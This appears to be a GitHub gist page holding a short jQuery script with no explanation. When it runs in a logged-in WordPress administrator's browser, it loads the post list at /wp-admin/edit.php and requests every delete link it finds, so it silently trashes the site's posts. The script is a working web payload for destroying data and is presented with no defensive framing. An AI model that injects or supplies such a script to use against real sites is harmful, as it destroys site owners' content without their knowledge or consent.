Skip to content

Instantly share code, notes, and snippets.

@spout
Created February 22, 2016 13:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save spout/42b97a73642fca62012d to your computer and use it in GitHub Desktop.
Save spout/42b97a73642fca62012d to your computer and use it in GitHub Desktop.
<script>
$(function() {
$.get('/wp-admin/edit.php', function(data) {
$(data).find('a.submitdelete').each(function() {
$.get($(this).attr('href'));
});
});
});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment